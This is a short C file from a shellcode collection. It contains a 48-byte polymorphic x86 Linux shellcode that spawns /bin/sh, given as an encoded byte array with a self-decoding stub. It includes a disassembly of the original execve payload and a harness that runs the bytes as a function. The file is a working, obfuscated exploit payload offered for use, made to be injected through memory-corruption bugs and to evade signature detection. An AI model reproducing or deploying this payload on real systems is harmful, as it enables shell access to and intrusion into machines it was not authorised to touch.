/* Title: Polymorphic Shellcode /bin/sh - 48 bytes Author: Jonathan Salwan Mail: submit [!] shell-storm.org ! DataBase of shellcode : http://www.shell-storm.org/shellcode/ Original Informations ===================== Disassembly of section .text: 08048060 <.text>: 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 2f 2f 73 68 push $0x68732f2f 8048068: 68 2f 62 69 6e push $0x6e69622f 804806d: 89 e3 mov %esp,%ebx 804806f: 50 push %eax 8048070: 53 push %ebx 8048071: 89 e1 mov %esp,%ecx 8048073: 99 cltd 8048074: b0 0b mov $0xb,%al 8048076: cd 80 int $0x80 */ #include "stdio.h" char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x32\x80" "\x6c\x0e\xff\x01\x80\xe9\x01\x75" "\xf6\xeb\x05\xe8\xea\xff\xff\xff" "\x32\xc1\x51\x69\x30\x30\x74\x69" "\x69\x30\x63\x6a\x6f\x8a\xe4\x51" "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"; int main() { printf("Polymorphic Shellcode - length: %d\n",strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; }